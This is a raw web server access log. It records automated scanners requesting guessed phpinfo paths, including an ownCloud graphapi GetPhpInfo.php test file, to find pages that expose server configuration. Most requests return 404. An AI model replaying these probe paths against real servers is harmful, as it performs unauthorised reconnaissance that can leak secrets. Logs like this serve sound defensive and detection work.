98.159.37.225 - - [07/Feb/2025:12:26:55 +0200] "GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php HTTP/1.1" 404 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
216.24.210.206 - - [07/Feb/2025:12:26:55 +0200] "GET /?phpinfo=1 HTTP/1.1" 200 902 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.141 - - [07/Feb/2025:12:26:56 +0200] "GET /tool/view/phpinfo.view.php HTTP/1.1" 404 224 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.219 - - [07/Feb/2025:12:26:57 +0200] "GET /phpinfo HTTP/1.1" 404 205 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0"
216.24.210.223 - - [07/Feb/2025:12:26:58 +0200] "GET /symfony/public/_profiler/phpinfo HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
173.239.218.141 - - [07/Feb/2025:12:26:58 +0200] "GET /html/phpinfo.php HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.203 - - [07/Feb/2025:12:26:59 +0200] "GET /?phpinfo=-1 HTTP/1.1" 200 902 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.147 - - [07/Feb/2025:12:27:00 +0200] "GET /__info.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.197 - - [07/Feb/2025:12:27:01 +0200] "GET /_info-backoffice.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.199 - - [07/Feb/2025:12:27:02 +0200] "GET /_info.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
173.239.218.143 - - [07/Feb/2025:12:27:02 +0200] "GET /_phpinf.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.136 - - [07/Feb/2025:12:27:02 +0200] "GET /_phpinfo.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
173.239.218.134 - - [07/Feb/2025:12:27:03 +0200] "GET /_poopinfo.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.133 - - [07/Feb/2025:12:27:04 +0200] "GET /.__info.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
173.239.218.146 - - [07/Feb/2025:12:27:05 +0200] "GET /.info.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.212 - - [07/Feb/2025:12:27:06 +0200] "GET /0.0_phpinfo.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.204 - - [07/Feb/2025:12:27:06 +0200] "GET /00_server_info.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.135 - - [07/Feb/2025:12:27:08 +0200] "GET /02-info.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
216.24.210.220 - - [07/Feb/2025:12:27:13 +0200] "GET /5info.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
